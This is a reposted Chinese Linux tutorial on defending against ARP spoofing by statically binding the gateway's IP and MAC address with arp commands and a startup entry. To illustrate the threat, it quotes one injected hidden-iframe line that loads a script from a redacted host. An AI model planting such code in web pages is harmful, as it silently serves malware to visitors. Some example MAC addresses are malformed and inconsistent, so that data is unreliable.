Linux绑定IP和MAC地址,防止ARP欺骗
作者 佚名技术
来源 Linux系统
浏览
发布时间 2012-04-05
| 本文章首发在“中国万网论坛 tech.www.com.cn”,也是本人BOB.WU筹建、管理的论坛,自乐一下,哈哈.
说明:本文中挂码链接已经被改为xxx,所用示例中的IP、MAC均为虚构.
一、ARP欺骗病毒,主要表现为: 中病毒的机器不仅影响自身,同时也会影响同网段的其它机器,将其它机器的HTTP数据包里加入病毒代码 .代码例子如: <html><iframe src=http://xxx.xxxxx.com/lsj.js width=0 height=0></iframe> 这种病毒危害非常大!即使你机器的安全性做得很好,可是没办法保证同网段的其它机器安全没有问题! 解决办法:在网关和本机上双向绑定IP和MAC地址,以防止ARP欺骗. 二、绑定 1、网关上已经对下面所带的机器作了绑定.网关IP:192.168.0.1 MAC:00:02:03:18:08:00 2、要进行绑定的Unix主机IP:192.168.0.2 MAC:00:04:61:9DB:02 三、绑定步骤 1、先使用arp和arp -a查看一下当前ARP缓存列表 [root@ftp]# arp Address HWtype HWaddress Flags Mask Iface 192.168.0.145 ether 00:13:20:E9:11:04 C eth0 192.168.0.1 ether 00:02:03:18:08:00 C eth0 说明: Address:主机的IP地址 Hwtype:主机的硬件类型 Hwaddress:主机的硬件地址 Flags Mask:记录标志,"C"表示arp高速缓存中的条目,"M"表示静态的arp条目. [root@ftp]# arp -a (192.168.0.145) at 00:13:20:E9:11:04 [ether] on eth0 (192.168.0.1) at 00:02:03:18:08:00 [ether] on eth0 2、新建一个静态的mac-->ip对应表文件:ip-mac,将要绑定的IP和MAC地下写入此文件,格式为 ip mac . [root@ftp]# echo ''192.168.0.1 00:02:03:18:08:00 '' > /etc/ip-mac [root@ftp]# more /etc/ip-mac 192.168.0.1 00:02:03:18:08:00 3、设置开机自动绑定 [root@ftp]# echo ''arp -f /etc/ip-mac '' >> /etc/rc.d/rc.local 4、手动执行一下绑定 [root@ftp]# arp -f /etc/ip-mac 5、确认绑定是否成功 [root@ftp]# arp Address HWtype HWaddress Flags Mask Iface 192.168.0.145 ether 00:13:20:E9:11:04 C eth0 192.168.0.1 ether 00:02:03:18:08:00 CM eth0 [root@ftp]# arp -a (192.168.0.145) at 00:02:B3:A75:48 [ether] on eth0 (192.168.0.1) at 00:02:03:18:08:00 [ether] PERM on eth0 从绑定前后的ARP缓存列表中,可以看到网关(192.168.0.1)的记录标志已经改变,说明绑定成功. 本文出自 “BOB.WU” 博客,请务必保留此出处http://bobwu.blog.51cto.com/2918362/559422 |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
上一篇: linux基础(三)下一篇: 读Linux那些事儿之我是U盘笔记(二)
关于Linux绑定IP和MAC地址,防止ARP欺骗的所有评论
